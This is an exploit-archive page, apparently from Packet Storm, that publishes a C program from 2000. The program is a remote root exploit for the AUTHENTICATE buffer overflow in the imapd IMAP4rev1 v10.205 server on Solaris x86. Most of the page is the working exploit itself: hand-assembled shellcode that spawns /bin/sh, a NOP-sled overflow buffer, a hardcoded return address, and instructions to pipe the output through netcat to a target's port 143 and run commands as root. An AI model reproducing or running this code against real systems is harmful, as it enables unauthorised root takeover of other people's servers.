what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

solx86-imapd.c

solx86-imapd.c
Posted Apr 25, 2000
Authored by Anathema | Site hack.co.za

imapd IMAP4rev1 v10.205 remote root exploit, solaris x86. Exploits the AUTHENTICATE overflow, yielding a remote root shell.

tags | exploit, remote, overflow, shell, x86, root
systems | solaris
SHA-256 | 60090c36ac8c823cce06c3173af240ef94222db30faac4df5e3b13de2c7a547b

solx86-imapd.c

Change Mirror Download
/* 
imapd IMAP4rev1 v10.205 remote root exploit, solaris x86 (not SPARC yet)
exploits the AUTHENTICATE overflow, yielding a remote root shell

shellcode is obviously modified to avoid problems with toupper()
by anathema <anathema@hack.co.za>
*/
/*
Compilation:
$ gcc imapd.c -o imapd
Requires netcat for usage:
$ (./imapd [offset]; cat) | nc host 143
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define RET 1028
#define ADDR 0x08047148

char c0de[] =
/* main: */
"\xeb\x33" /* jmp callz */
/* start: */
"\x5e" /* popl %esi */
"\x8d\x06" /* leal (%esi), %eax */
"\x29\xc9" /* subl %ecx, %ecx */
"\x89\xf3" /* movl %esi, %ebx */
"\x89\x5e\x08" /* movl %ebx, 0x08(%esi) */
"\xb1\x07" /* movb $0x07, %cl */
/* loopz: */
/*
Go through a loop, incrementing the `/bin/sh -= 0x20` string
by 0x20, yielding /bin/sh for execve(). Why do other exploits
increment each char individually? Using the loop instruction is
far more efficient.. -a
*/
"\x80\x03\x20" /* addb $0x20, (%ebx) */
"\x43" /* incl %ebx */
"\xe0\xfa" /* loopne loopz */
"\x93" /* xchgl %eax, %ebx */
"\x29\xc0" /* subl %eax, %eax */
"\x89\x5e\x0b" /* movl %ebx, 0x0b(%esi) */
"\x29\xd2" /* subl %edx, %edx */
"\x88\x56\x19" /* movb %dl, 0x19(%esi) */
"\x89\x56\x07" /* movl %edx, 0x07(%esi) */
"\x89\x56\x0f" /* movl %edx, 0x0f(%esi) */
"\x89\x56\x14" /* movl %edx, 0x14(%esi) */
"\xb0\x3b" /* movb $0x3b, %al */
"\x8d\x4e\x0b" /* leal 0x0b(%esi), %ecx */
"\x89\xca" /* movl %ecx, %edx */
"\x52" /* pushl %edx */
"\x51" /* pushl %ecx */
"\x53" /* pushl %ebx */
"\x50" /* pushl %eax */
"\xeb\x18" /* jmp lcall */
/* callz: */
"\xe8\xc8\xff\xff\xff" /* call start */
"\x0f\x42\x49\x4e\x0f\x53\x48" /* /bin/sh -= 0x20 */
"\x01\x01\x01\x01\x02\x02\x02\x02\x03\x03\x03\x03"
/* lcall: */
"\x9a\x04\x04\x04\x04\x07\x04";

int
main (int argc, char **argv)
{
u_char buf[4096] = {0};
u_long addr = ADDR;
int ret = RET, i = 0, j = 0;

if (argc > 1) addr += atoi(argv[1]);
fprintf(stderr, "addr 0x%lx\n", addr);

memset(buf, 0x90, ret);
memcpy(buf + ret - strlen(c0de), c0de, strlen(c0de));
for (i = ret; i < ret + 28; i++)
{
buf[i+0] = (addr & 0xff);
buf[i+1] = (addr >> 8) & 0xff;
buf[i+2] = (addr >> 16) & 0xff;
buf[i+3] = (addr >> 24) & 0xff;
}

printf("* AUTHENTICATE {%d}\r\n", strlen(buf));
printf("%s\n", buf);

sleep(1);
printf("\nuname -a; id;\n");
}

/* EOF */
/* www.hack.co.za */
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    69 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close